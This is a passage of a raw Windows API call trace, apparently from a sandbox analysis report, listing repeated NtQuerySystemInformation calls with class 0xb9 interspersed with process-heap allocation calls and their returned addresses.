(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] GetProcessHeap () returned 0x269489b0000 [0233.625] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x3e) returned 0x26948a4fd60 [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.627] GetProcessHeap () returned 0x269489b0000 [0233.627] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x3e) returned 0x26948a50350 [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] GetProcessHeap () returned 0x269489b0000 [0233.632] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x269495956f0 [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] GetProcessHeap () returned 0x269489b0000 [0233.634] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x4e) returned 0x26948a4dc90 [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.637] GetProcessHeap () returned 0x269489b0000 [0233.637] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949595a00 [0233.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.640] GetProcessHeap () returned 0x269489b0000 [0233.640] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x4a) returned 0x26948a4d750 [0233.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] GetProcessHeap () returned 0x269489b0000 [0233.643] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949595d80 [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.646] GetProcessHeap () returned 0x269489b0000 [0233.646] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x4c) returned 0x26948a4db10 [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation 